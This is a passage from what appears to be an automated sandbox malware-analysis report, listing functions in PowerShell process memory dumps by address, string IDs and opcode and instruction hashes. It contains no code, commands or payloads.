                                        • Instruction ID: cf7bd7ca7a40407230eea65a61ac5dab0ea1aa82ae69a837ea2efcb51fb5f591
                                        • Opcode Fuzzy Hash: f6a3982ef8325aa0da66fbb4ee6eded78e51b45c0ed64877a0e58b9232c098a0
                                        • Instruction Fuzzy Hash: 36A168B170431E8FC7254A6D981067ABBE9AFC2624F1884ABD445CF395DA33CCE5C7A1
                                        Function 07910FE0 Relevance: 7.7, Strings: 6, Instructions: 191COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1868435481.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7910000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: tP^q$tP^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-2782953261
                                        • Opcode ID: c4af1219b23398dc089d11c2779c1cdddaa8ddc5388e5e0801aad603472fc8e7
                                        • Instruction ID: c4fa8ada41740c6823dff43b8d8a8396d90cfe9866986f2b580c412216ef234e
                                        • Opcode Fuzzy Hash: c4af1219b23398dc089d11c2779c1cdddaa8ddc5388e5e0801aad603472fc8e7
                                        • Instruction Fuzzy Hash: 9E519B71B9435EAFDB248A699804766FFFAAF82314F24C46BE205CF391CA71C850C391
                                        Function 07913228 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1868435481.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7910000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q
                                        • API String ID: 0-2125118731
                                        • Opcode ID: 39937333eb510e4d0179cb50740772338ab216c4be49544caba74bece790f630
                                        • Instruction ID: 5460055bcf837e651bfd66207fdc3dc2a17b99d650cf6d5a0354254e511d7874
                                        • Opcode Fuzzy Hash: 39937333eb510e4d0179cb50740772338ab216c4be49544caba74bece790f630
                                        • Instruction Fuzzy Hash: 70216BB170431E9BDB38652E5801B2BABEE9BC1B19F648C7AD405CF385CD76C8558361
                                        Function 0791030A Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1868435481.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7910000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$$^q$$^q
                                        • API String ID: 0-2049395529
                                        • Opcode ID: cc914816cd8a03eba4c89d8e26711a3e8d8ed4f5d3bcb34d6f0871afaf98ff5a
                                        • Instruction ID: 28bedf7c9c464a2dc692a6c09f7044ab2f30a2a78e12d699bda73f2c1cc8fe2f
                                        • Opcode Fuzzy Hash: cc914816cd8a03eba4c89d8e26711a3e8d8ed4f5d3bcb34d6f0871afaf98ff5a
                                        • Instruction Fuzzy Hash: 97018F6174D3D98FC72B522D18241656FB65F8391471A45EBC081CF3ABCD668D8B83A3

                                        Executed Functions

                                        Function 0342D006 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2023617009.000000000342D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0342D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_342d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 795304a143f540499e74619db7ff6f32ab0ea543b986aa0755cda4f99e245f80
                                        • Instruction ID: 5cebc87798b94a274ab6ed8f8377120fc157a4ac70efe56bd56601412d59b20c
                                        • Opcode Fuzzy Hash: 795304a143f540499e74619db7ff6f32ab0ea543b986aa0755cda4f99e245f80
                                        • Instruction Fuzzy Hash: 8E012D6140E3C09ED7128B258894B56BFB4EF47224F1DC1DBD8889F2A3C2699845C772
                                        Function 0342D01D Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2023617009.000000000342D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0342D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_342d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e3af0f992bdd40c71cd1ec360fb3d9168e0b6889ea4cfb6fd61f205266e4d8e
                                        • Instruction ID: fa3380e81dbc1e1a893b50f63c569e0d3c11ed7d9656029934639582712d5b47
                                        • Opcode Fuzzy Hash: 1e3af0f992bdd40c71cd1ec360fb3d9168e0b6889ea4cfb6fd61f205266e4d8e
                                        • Instruction Fuzzy Hash: D2012B718083109AE710CA25CD84B67FF9CEF42328F5CC46BEC686F296C279D842C6B5
                                        Function 03543026 Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2024315635.0000000003540000.00000040.00000800.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_3540000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 20318bdb3c407efc908ecf8b1bec5e3d8e7ad22c13413e85322536a4e1c4a4d2
                                        • Instruction ID: 592a9d21f231d8fcc38568fa49124d710059238365e5317465af966c620f232b
                                        • Opcode Fuzzy Hash: 20318bdb3c407efc908ecf8b1bec5e3d8e7ad22c13413e85322536a4e1c4a4d2
                                        • Instruction Fuzzy Hash: D3F03A35A000049FCB04CF9DD890AEEF7B1FF88324F208159E515A72A0C336AC52CB50

                                        Executed Functions

                                        Function 06F84330 Relevance: 21.3, Strings: 16, Instructions: 1280COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.2018241996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6f80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (bq$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$$^q
                                        • API String ID: 0-621706134
                                        • Opcode ID: 24a237ad1a7bd59dda744c5ab5a89c2b57c2c0ffe90f405642b50d21e55c08ac
                                        • Instruction ID: 35b6d4f33bdc9b29637ead9b5a42679d5d758f1308b1f5777368b6ccd385ea76
                                        • Opcode Fuzzy Hash: 24a237ad1a7bd59dda744c5ab5a89c2b57c2c0ffe90f405642b50d21e55c08ac
                                        • Instruction Fuzzy Hash: 95923531F043568FDB55AB689810A6ABBE6AFC6610F1484FBD405CF296DB32CC85C7E1
                                        Function 06F81278 Relevance: 15.5, Strings: 12, Instructions: 475COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.2018241996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6f80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-3666705573
                                        • Opcode ID: 3c7f7833dbed30597cc3aa832786d9a3fa908478b8c891e5a25a002de3ff43e5
                                        • Instruction ID: 7dc3807f61252a87ce02212789934836d01c9d4047d7c75c497d4088a1f44989
                                        • Opcode Fuzzy Hash: 3c7f7833dbed30597cc3aa832786d9a3fa908478b8c891e5a25a002de3ff43e5
                                        • Instruction Fuzzy Hash: 81E15831F043068FD764EB79981067ABBE5AFC2610B1886EBD445CF295DB32CD86C7A1
                                        Function 06F85548 Relevance: 12.4, Strings: 8, Instructions: 2393COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.2018241996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6f80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q
                                        • API String ID: 0-1800232277
                                        • Opcode ID: fdf47d64e3a1006c65691c9d3bb44994a0861497d772b4fdd6c0a52734b0e306
                                        • Instruction ID: 310f7679022f85fc33043fb9c0e5752d13dfd47f7a3caa23bc461eba9c38a10a
                                        • Opcode Fuzzy Hash: fdf47d64e3a1006c65691c9d3bb44994a0861497d772b4fdd6c0a52734b0e306
                                        • Instruction Fuzzy Hash: 2CC2B034F003049FDB94EF68C951AAABBE2AF85714F14C0AAE4059F355DB32DD85CB92
                                        Function 06F801E8 Relevance: 8.0, Strings: 6, Instructions: 451COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.2018241996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6f80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-3669853574
                                        • Opcode ID: 92201ad12af1ce8b6e5b287ac42f7440b84c3f86ca2fe6416a5df8041d21cd8a
                                        • Instruction ID: 415ca6bc966c9e3f2c08a3628a036a0ab922218dfbbc144e31ea6fe9f6fa2617
                                        • Opcode Fuzzy Hash: 92201ad12af1ce8b6e5b287ac42f7440b84c3f86ca2fe6416a5df8041d21cd8a
                                        • Instruction Fuzzy Hash: 77E10331F003098FDBA4AB68C854A6ABBE6BFD4710B54C4AAD405DF355DE32CC89C7A1
                                        Function 06F81258 Relevance: 3.9, Strings: 3, Instructions: 113COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.2018241996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6f80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$$^q$$^q
                                        • API String ID: 0-2291298209
                                        • Opcode ID: c2fc426db682be9700ba298f66e28384e203f1a9bb2d0961789bd228700539d0
                                        • Instruction ID: 6cf84e050b2bc9f562f9ac3e06cc2422579b5eda28b0f76287f54e1768dde70b
                                        • Opcode Fuzzy Hash: c2fc426db682be9700ba298f66e28384e203f1a9bb2d0961789bd228700539d0
                                        • Instruction Fuzzy Hash: 5C310531E0430ACFDB61EE2484117BA3BE5AF92214F5943E6D804DF195E739CE86C7A2
                                        Function 06F84910 Relevance: 2.6, Strings: 2, Instructions: 98COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.2018241996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6f80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$tP^q
                                        • API String ID: 0-1785267070
                                        • Opcode ID: 8c85f853ca8bf7baf9bd4fe778caf174b9dc35c42129ff44516e7d2fa557e1a8
                                        • Instruction ID: c5da05801d1d92e3220e3135522c72cbd91fc43265f7237782468c44e879fadd
                                        • Opcode Fuzzy Hash: 8c85f853ca8bf7baf9bd4fe778caf174b9dc35c42129ff44516e7d2fa557e1a8
                                        • Instruction Fuzzy Hash: 29318D31E102169FEBA4EE19C644B66B7E2BB84720F15C0E9D8199F254DB71DC80CB95
                                        Function 06F80480 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.2018241996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6f80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q
                                        • API String ID: 0-388095546
                                        • Opcode ID: 1a9b6914e76d1c29e31da71b1949d7a6a09b3e645be595376a3e8b6a619c9480
                                        • Instruction ID: 11943e12ac3d2f3e764c18fc16a3c9fe36d6670b8d936ddd60899c3fe186fa3d
                                        • Opcode Fuzzy Hash: 1a9b6914e76d1c29e31da71b1949d7a6a09b3e645be595376a3e8b6a619c9480
                                        • Instruction Fuzzy Hash: E4216071B00305DFE764EE18C984A26B7AAFF84654B58C5A9E8198F255CF32DC45CBA0
                                        Function 06F85980 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.2018241996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6f80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q
                                        • API String ID: 0-1614139903
                                        • Opcode ID: a7532ac8a10086e96c278bce557465a997c9f23c86b876ada79098e043131283
                                        • Instruction ID: 6db691ac5c98725f94bc1f5660e76ed10892a9b1689a8446ad83c05122a88ebf
                                        • Opcode Fuzzy Hash: a7532ac8a10086e96c278bce557465a997c9f23c86b876ada79098e043131283
                                        • Instruction Fuzzy Hash: 00218E70E10205DFDFE4EF69C5C46697BE2BB44760F1881EAD4098B254D731D884CBA1
                                        Function 028D2C70 Relevance: .6, Instructions: 612COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1987503419.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_28d0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 06e458c4af965e22a244749008c427ad8a921278ec522899a97cc1a73835e974
                                        • Instruction ID: a936a7be643d1cf83ee1e94465670195069af712b84f3805301688107c7b258d
                                        • Opcode Fuzzy Hash: 06e458c4af965e22a244749008c427ad8a921278ec522899a97cc1a73835e974
                                        • Instruction Fuzzy Hash: 8A32AD78E05248AFCB05CFA8D490A9DBBF1BF49314F15809AE444EB366C731DD8ACB91
                                        Function 028D4D20 Relevance: .6, Instructions: 582COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1987503419.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_28d0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 366662e36b837ff740325ae8503fe6c6477b7cd4f02a32d965217f1e0c5e56af
                                        • Instruction ID: 516b5c9209d477ac0933df1e71a1c7f770d2f44619cf90949232ef29318f5470
                                        • Opcode Fuzzy Hash: 366662e36b837ff740325ae8503fe6c6477b7cd4f02a32d965217f1e0c5e56af
                                        • Instruction Fuzzy Hash: 7032E6789053849FCB06DF68C890A9DBFB2EF4A314F19819AE444EB366C735DC49CB91
                                        Function 028D6FC0 Relevance: .4, Instructions: 369COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1987503419.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_28d0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bd1bb95b25b06f4d8779c56c5e942a9f61ddaf1637197ea9b66dbb821983f51a
                                        • Instruction ID: e455232a732d81c84450dd1de3b29e6468cdfb963bef70f9d4fdf74e410859c8
                                        • Opcode Fuzzy Hash: bd1bb95b25b06f4d8779c56c5e942a9f61ddaf1637197ea9b66dbb821983f51a
                                        • Instruction Fuzzy Hash: 36E16078A05248DFDB05CF68D480A9DFBB2BF49314F19819AE844EB366C735ED49CB90
                                        Function 028D4150 Relevance: .3, Instructions: 349COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1987503419.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_28d0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6bf13ea4b9f44adf32e41aa754dcf36b17a81aef620d5c19d0fcd4c644a5aa2e
                                        • Instruction ID: 05f4442d67d6e012ebcbec882b26efe426ea995658a8b397463c8a50ba8c13db
                                        • Opcode Fuzzy Hash: 6bf13ea4b9f44adf32e41aa754dcf36b17a81aef620d5c19d0fcd4c644a5aa2e
                                        • Instruction Fuzzy Hash: 8AE1BF78A042458FCB05CF98C494AAEFBB2FF48314B24859AD455EB3A5C735FC55CBA0
                                        Function 06F82AE0 Relevance: .2, Instructions: 182COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.2018241996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6f80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c2fceed72b0ced0648d3d4245c6c3dc34a8ad93990ce3fd9ec62bc35535b108a
                                        • Instruction ID: 14da001d61cc81c21ff8e50ffe3b7ec3518f5addd379adac101445154e684c61
                                        • Opcode Fuzzy Hash: c2fceed72b0ced0648d3d4245c6c3dc34a8ad93990ce3fd9ec62bc35535b108a
                                        • Instruction Fuzzy Hash: 7C511531F003148FDB54AB699911A7E7BE6AFD6720B1480EAC501DF396DA31EA41C7E1
                                        Function 028D4C75 Relevance: .2, Instructions: 168COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1987503419.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_28d0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 97acb6bb185dd40302c6c2d1e64047b1865c3bddb7ca2237c3f49dfea9860fed
                                        • Instruction ID: cf27e68e6d178125d544f30be615a1aa64e8563b9b9234a8af9e85eaa151eca9
                                        • Opcode Fuzzy Hash: 97acb6bb185dd40302c6c2d1e64047b1865c3bddb7ca2237c3f49dfea9860fed
                                        • Instruction Fuzzy Hash: 3751D8349093849FCB06DF7CC8A449ABFB1EF8A310B194597D454DB2A2D334DC59CBA5
                                        Function 028D4CC5 Relevance: .1, Instructions: 141COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1987503419.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_28d0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cf2732617652f464e33d4bd247b2370423f12178791cc290b1703c29ddae8950
                                        • Instruction ID: f04393293c3f7d2125edd0c01726c53de3e11863a479efbc090901ae9c961e52
                                        • Opcode Fuzzy Hash: cf2732617652f464e33d4bd247b2370423f12178791cc290b1703c29ddae8950
                                        • Instruction Fuzzy Hash: 0B51B534A053849FCB05DF6CC8944AABFF1EF8A314B254596D454DB3A2D334EC59CBA1
                                        Function 028D5069 Relevance: .1, Instructions: 133COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1987503419.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_28d0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 299ad8ae831fc8072122a8fa7685489067784ada12886818ae70c414d8c1a429
                                        • Instruction ID: 552ed2e502725b15499d3cda205de5e7f75cf6bede72849c28331b0bf5e42ceb
                                        • Opcode Fuzzy Hash: 299ad8ae831fc8072122a8fa7685489067784ada12886818ae70c414d8c1a429
                                        • Instruction Fuzzy Hash: D851E874A00209AFDB05DFA8D584A9DFBF2FF88314F648559E804AB365C735ED86CB90
                                        Function 06F82AC4 Relevance: .1, Instructions: 122COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.2018241996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6f80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3107f5db64de50192d43f469837830b0597b75a9b6c6871fb5ff9f4a7e96ba94
                                        • Instruction ID: 74e1e0953109790464b08ead2a64a337e78fb683e88252cc4a37b71f2c98a05e
                                        • Opcode Fuzzy Hash: 3107f5db64de50192d43f469837830b0597b75a9b6c6871fb5ff9f4a7e96ba94
                                        • Instruction Fuzzy Hash: 15411231E01304CFDB64AF258941A7A7BF6AF95760B1581E6C8019F296D731EB81C7E1
                                        Function 028D3179 Relevance: .1, Instructions: 120COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1987503419.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_28d0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a2f164d51e03d23b882aeaf824973bca73d1d0de1526d9f6f9dd31f61f32322b
                                        • Instruction ID: 0872b4c0b598e4c131faa2f17e85bad96466f5f0906479197d9a88f595ef7bef
                                        • Opcode Fuzzy Hash: a2f164d51e03d23b882aeaf824973bca73d1d0de1526d9f6f9dd31f61f32322b
                                        • Instruction Fuzzy Hash: A351E978A00209AFDB04DBA8D584AADFBF2BF88314F24C559E408AB365C735ED85CF50
                                        Function 028D43A8 Relevance: .1, Instructions: 110COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1987503419.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_28d0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0836b6450982b43332fbb7d93b2113925f5a8ad0fc223070c950f01fece8c6b3
                                        • Instruction ID: 56539be70fb2997bf0b75c9a1a41f3ac8a1baae93070f8a361de0e7df4afe49d
                                        • Opcode Fuzzy Hash: 0836b6450982b43332fbb7d93b2113925f5a8ad0fc223070c950f01fece8c6b3
                                        • Instruction Fuzzy Hash: AF4138B8A015059FCB05CF99C194EAAFBB2FF48314B11819AD905AB365C736FC94CFA0
                                        Function 028D6FB0 Relevance: .1, Instructions: 60COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1987503419.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_28d0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5b925a0e08cb0def151750cbd5256bf6467207b01125103898f60c3b36ba0acb
                                        • Instruction ID: cb5ca418f3005bb746403898cb82f2f2f4939f633769ecc21824e639f674fc02
                                        • Opcode Fuzzy Hash: 5b925a0e08cb0def151750cbd5256bf6467207b01125103898f60c3b36ba0acb
                                        • Instruction Fuzzy Hash: 32212C78A00249DFCB01CF98D5809AEFBB5FF89310B148599E909EB352C735ED45CBA1
                                        Function 06F80C46 Relevance: .1, Instructions: 58COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.2018241996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6f80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f3168944ae1a0c3210a8e76b9ba1f3a5f367f6d96342fd94f9b19c9fd3a369c8
                                        • Instruction ID: 28e12b5e872fb3274f194bc77bd17216db55f94df43da65f4aa9a93faa3ac7c6
                                        • Opcode Fuzzy Hash: f3168944ae1a0c3210a8e76b9ba1f3a5f367f6d96342fd94f9b19c9fd3a369c8
                                        • Instruction Fuzzy Hash: F5112135B402046FD740EAA8D811BAEF3E6EF89708F24C059E409DB391CE32EC468756
                                        Function 06F80C79 Relevance: .1, Instructions: 52COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.2018241996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6f80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dc8ffe336f49435f600cdebff330ad3625d16ad694509acd390661b444ce70c7
                                        • Instruction ID: 8a39a4ff78f66d95487d1ede2cd5b979fb0d9fc3a2cde3c0af26b498e88e8be1
                                        • Opcode Fuzzy Hash: dc8ffe336f49435f600cdebff330ad3625d16ad694509acd390661b444ce70c7
                                        • Instruction Fuzzy Hash: E31104206093882FD3125B345C25B2E3FF29F82700F5590DAE444DF2E3DC689C898367
                                        Function 028D328A Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1987503419.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_28d0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7e7c529fac55d3055a1587e6eb75f1feceb995c15cbb54329190dadd7f2d6541
                                        • Instruction ID: 10cbe5183d07b9ada37adbaf96f6ea8fbaed71bbce4a321d047edf2dec3f4ccc
                                        • Opcode Fuzzy Hash: 7e7c529fac55d3055a1587e6eb75f1feceb995c15cbb54329190dadd7f2d6541
                                        • Instruction Fuzzy Hash: DE110778A00209AFDB44CBA8D484BADFBF1BF48314F24C199E405AB361C735ED85CB90
                                        Function 028D51A8 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1987503419.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_28d0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0564ca74d4413e5781b7d41add5ca798148049475cc7857af05ac0b1ce839098
                                        • Instruction ID: d4a150110abc378ce5e9e302bb504f7e4801ee9389817342cf832cb8d9356e79
                                        • Opcode Fuzzy Hash: 0564ca74d4413e5781b7d41add5ca798148049475cc7857af05ac0b1ce839098
                                        • Instruction Fuzzy Hash: 7111C639A00209EFDF05CF98D884A9DBBB2FF48314F698159E405AB365C775E986CB80
                                        Function 027CD01D Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1987000524.00000000027CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027CD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_27cd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5c9e4176035f2f3e39f4bb20c73d25489e4113051446c140462a557626dcfe21
                                        • Instruction ID: d97caa335b3dfeb3f2ef155ce7ba87e112dc8e56c08134bcffbe598537d76409
                                        • Opcode Fuzzy Hash: 5c9e4176035f2f3e39f4bb20c73d25489e4113051446c140462a557626dcfe21
                                        • Instruction Fuzzy Hash: C6018F715093409AE7208A79CD84B67BF98EF41334F28C53EED495A246C779D886C6B1
                                        Function 027CD007 Relevance: .0, Instructions: 44COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1987000524.00000000027CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027CD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_27cd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 378f9d77319b4b2ac8609be997cab9df8e18c8b900863229eec3f2f13d67af7c
